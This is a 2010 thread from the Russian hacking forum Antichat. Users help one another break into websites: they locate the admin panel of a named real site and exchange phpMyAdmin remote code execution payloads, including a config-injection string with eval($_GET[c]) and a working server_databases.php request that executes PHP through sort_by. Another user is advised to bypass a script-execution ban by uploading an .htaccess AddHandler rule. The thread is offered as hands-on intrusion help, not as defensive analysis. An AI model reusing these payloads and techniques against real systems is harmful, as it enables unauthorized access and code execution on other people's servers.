Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.06.2010, 17:21
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
http://www.fragrance.org/
помогите найти админку))
директория phpmyadmin и members не интересует=)
|
|
|
17.06.2010, 17:37
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
|
|
|
|
17.06.2010, 18:01
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от wildshaman
Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
mq=on, неполучится.
|
|
|
|
17.06.2010, 19:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ммммм, а какая связь между этим сплойтом и маджиками, процтите?)
|
|
|
|
17.06.2010, 19:02
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
Сообщение от jecka3000
http://www.fragrance.org/
помогите найти админку))
директория phpmyadmin и members не интересует=)
http://fragrance.org/ControlPanel/
вроде вот она..
|
|
|
|
17.06.2010, 19:21
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Pashkela
ммммм, а какая связь между этим сплойтом и маджиками, процтите?)
А ты посмотри ^_^
Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.
И так.
Есть у нас создание конфига, там вписать можно небольшое количество параметров.
Вообще без разницы куда вписывать, но лучше в host.
Если мы пишем хост: localhost, то в конфиге.
А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); //
И получается нечто вроде:
PHP код:
$host = 'localhost\';eval($_GET[c]); //
Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ!
$host = 'localhost\';eval($_GET[c]); //
Сам догадаешься причём там mq ?
Или ты мне хочешь показать особые условия? 
Последний раз редактировалось Ctacok; 17.06.2010 в 19:24..
|
|
|
|
17.06.2010, 19:34
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
привет всем, есть одна проблема. Суть: Есть админка. Могу загружать файлы любых типов. Скрипты, doc, pdf, всякие идут в папку files, изображения в папку gallery. Но в папке files запрещены выполнение скриптов=(((. Что делать, посоветуйте пожалуйста...
|
|
|
|
17.06.2010, 19:40
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от pinch
привет всем, есть одна проблема. Суть: Есть админка. Могу загружать файлы любых типов. Скрипты, doc, pdf, всякие идут в папку files, изображения в папку gallery. Но в папке files запрещены выполнение скриптов=(((. Что делать, посоветуйте пожалуйста...
.htaccess залить,
AddHandler application/x-httpd-php .php
// Значит не судьба
Последний раз редактировалось Ctacok; 17.06.2010 в 19:42..
|
|
|
|
17.06.2010, 19:41
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
нет пробовал грит "файл с таким именем уже есть!"
|
|
|
|
17.06.2010, 19:45
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Ctacok
А ты посмотри ^_^
Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу.
И так.
Есть у нас создание конфига, там вписать можно небольшое количество параметров.
Вообще без разницы куда вписывать, но лучше в host.
Если мы пишем хост: localhost, то в конфиге.
А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); //
И получается нечто вроде:
PHP код:
$host = 'localhost\';eval($_GET[c]); //
Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ!
Сам догадаешься причём там mq ?
Или ты мне хочешь показать особые условия? Я не вникал в тему, но разве нельзя использовать {}?
Что-то вроде:
PHP код:
<?php
$sting = ${@eval($_REQUEST[c])};
?>
Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал.
//upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос:
Код:
/phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
Последний раз редактировалось m0Hze; 17.06.2010 в 19:49..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
